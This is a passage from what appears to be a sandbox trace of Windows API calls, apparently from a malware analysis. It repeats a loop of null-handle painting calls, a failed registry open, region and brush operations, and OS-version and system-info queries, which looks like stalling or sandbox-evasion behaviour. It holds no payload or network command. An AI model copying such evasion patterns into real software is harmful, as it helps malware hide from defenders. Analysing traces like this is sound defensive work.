lpPaint=0x1817cc) returned 0x0 [0090.125] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.125] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.125] BeginPath (hdc=0x0) returned 0 [0090.125] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.125] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.125] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.125] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.125] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.125] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401dc [0090.125] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401d9 [0090.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457eb [0090.125] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457ec [0090.126] CombineRgn (hrgnDst=0x10457eb, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=1) returned 1 [0090.126] CombineRgn (hrgnDst=0x10457ec, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=4) returned 2 [0090.126] CreateSolidBrush (color=0xff) returned 0x21057ea [0090.126] CreateSolidBrush (color=0xff0000) returned 0x11057ed [0090.126] DeleteObject (ho=0x11057ed) returned 1 [0090.126] DeleteObject (ho=0x150401d9) returned 1 [0090.126] DeleteObject (ho=0x130401dc) returned 1 [0090.126] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.126] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.126] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.126] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.126] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.126] BeginPath (hdc=0x0) returned 0 [0090.126] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.126] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.126] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.126] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.126] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.126] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.126] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.126] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401d9 [0090.126] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401dc [0090.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457ee [0090.126] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457ef [0090.126] CombineRgn (hrgnDst=0x10457ee, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=1) returned 1 [0090.126] CombineRgn (hrgnDst=0x10457ef, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=4) returned 2 [0090.126] CreateSolidBrush (color=0xff) returned 0x21057ed [0090.126] CreateSolidBrush (color=0xff0000) returned 0x11057f0 [0090.126] DeleteObject (ho=0x11057f0) returned 1 [0090.126] DeleteObject (ho=0x140401dc) returned 1 [0090.126] DeleteObject (ho=0x160401d9) returned 1 [0090.126] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.126] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.126] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.126] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.126] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.127] BeginPath (hdc=0x0) returned 0 [0090.127] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.127] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.127] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.127] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.127] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401dc [0090.127] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401d9 [0090.127] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f1 [0090.127] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f2 [0090.127] CombineRgn (hrgnDst=0x10457f1, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=1) returned 1 [0090.127] CombineRgn (hrgnDst=0x10457f2, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=4) returned 2 [0090.127] CreateSolidBrush (color=0xff) returned 0x21057f0 [0090.127] CreateSolidBrush (color=0xff0000) returned 0x11057f3 [0090.127] DeleteObject (ho=0x11057f3) returned 1 [0090.127] DeleteObject (ho=0x170401d9) returned 1 [0090.127] DeleteObject (ho=0x150401dc) returned 1 [0090.127] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.127] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.127] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.127] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.127] BeginPath (hdc=0x0) returned 0 [0090.127] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.127] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.127] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.127] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.127] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.127] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.128] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401d9 [0090.128] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401dc [0090.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f4 [0090.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f5 [0090.128] CombineRgn (hrgnDst=0x10457f4, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=1) returned 1 [0090.128] CombineRgn (hrgnDst=0x10457f5, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=4) returned 2 [0090.128] CreateSolidBrush (color=0xff) returned 0x21057f3 [0090.128] CreateSolidBrush (color=0xff0000) returned 0x11057f6 [0090.128] DeleteObject (ho=0x11057f6) returned 1 [0090.128] DeleteObject (ho=0x160401dc) returned 1 [0090.128] DeleteObject (ho=0x180401d9) returned 1 [0090.128] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.128] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.128] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.128] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.128] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.128] BeginPath (hdc=0x0) returned 0 [0090.128] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.128] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.128] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.128] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.128] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.128] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.128] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.128] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401dc [0090.128] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401d9 [0090.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f7 [0090.128] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457f8 [0090.128] CombineRgn (hrgnDst=0x10457f7, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=1) returned 1 [0090.128] CombineRgn (hrgnDst=0x10457f8, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=4) returned 2 [0090.128] CreateSolidBrush (color=0xff) returned 0x21057f6 [0090.128] CreateSolidBrush (color=0xff0000) returned 0x11057f9 [0090.128] DeleteObject (ho=0x11057f9) returned 1 [0090.128] DeleteObject (ho=0x190401d9) returned 1 [0090.128] DeleteObject (ho=0x170401dc) returned 1 [0090.128] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.128] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.129] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.129] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.129] BeginPath (hdc=0x0) returned 0 [0090.129] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.129] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.129] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.129] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.129] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.129] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401d9 [0090.129] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401dc [0090.129] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457fa [0090.129] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457fb [0090.129] CombineRgn (hrgnDst=0x10457fa, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=1) returned 1 [0090.129] CombineRgn (hrgnDst=0x10457fb, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=4) returned 2 [0090.129] CreateSolidBrush (color=0xff) returned 0x21057f9 [0090.129] CreateSolidBrush (color=0xff0000) returned 0x11057fc [0090.129] DeleteObject (ho=0x11057fc) returned 1 [0090.129] DeleteObject (ho=0x180401dc) returned 1 [0090.129] DeleteObject (ho=0x1a0401d9) returned 1 [0090.129] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.129] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.129] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.129] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.129] BeginPath (hdc=0x0) returned 0 [0090.129] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.129] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.129] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.129] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.129] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.129] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.130] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401dc [0090.130] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401d9 [0090.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457fd [0090.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457fe [0090.130] CombineRgn (hrgnDst=0x10457fd, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=1) returned 1 [0090.130] CombineRgn (hrgnDst=0x10457fe, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=4) returned 2 [0090.130] CreateSolidBrush (color=0xff) returned 0x21057fc [0090.130] CreateSolidBrush (color=0xff0000) returned 0x11057ff [0090.130] DeleteObject (ho=0x11057ff) returned 1 [0090.130] DeleteObject (ho=0x1b0401d9) returned 1 [0090.130] DeleteObject (ho=0x190401dc) returned 1 [0090.130] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.130] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.130] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.130] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.130] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.130] BeginPath (hdc=0x0) returned 0 [0090.130] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.130] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.130] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.130] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.130] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.130] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.130] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.130] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401d9 [0090.130] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401dc [0090.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045800 [0090.130] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045801 [0090.130] CombineRgn (hrgnDst=0x1045800, hrgnSrc1=0x1c0401d9, hrgnSrc2=0x1a0401dc, iMode=1) returned 1 [0090.131] CombineRgn (hrgnDst=0x1045801, hrgnSrc1=0x1c0401d9, hrgnSrc2=0x1a0401dc, iMode=4) returned 2 [0090.131] CreateSolidBrush (color=0xff) returned 0x21057ff [0090.131] CreateSolidBrush (color=0xff0000) returned 0x1105802 [0090.131] DeleteObject (ho=0x1105802) returned 1 [0090.131] DeleteObject (ho=0x1a0401dc) returned 1 [0090.131] DeleteObject (ho=0x1c0401d9) returned 1 [0090.131] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.131] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.131] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.131] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.131] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.131] BeginPath (hdc=0x0) returned 0 [0090.131] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.131] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.131] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.131] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.131] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.131] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.131] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.131] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.131] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401dc [0090.131] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401d9 [0090.131] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045803 [0090.131] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045804 [0090.131] CombineRgn (hrgnDst=0x1045803, hrgnSrc1=0x1b0401dc, hrgnSrc2=0x1d0401d9, iMode=1) returned 1 [0090.131] CombineRgn (hrgnDst=0x1045804, hrgnSrc1=0x1b0401dc, hrgnSrc2=0x1d0401d9, iMode=4) returned 2 [0090.131] CreateSolidBrush (color=0xff) returned 0x2105802 [0090.131] CreateSolidBrush (color=0xff0000) returned 0x1105805 [0090.131] DeleteObject (ho=0x1105805) returned 1 [0090.131] DeleteObject (ho=0x1d0401d9) returned 1 [0090.131] DeleteObject (ho=0x1b0401dc) returned 1 [0090.131] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.131] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.131] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.131] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.131] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.132] BeginPath (hdc=0x0) returned 0 [0090.132] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.132] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.132] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.132] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.132] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, 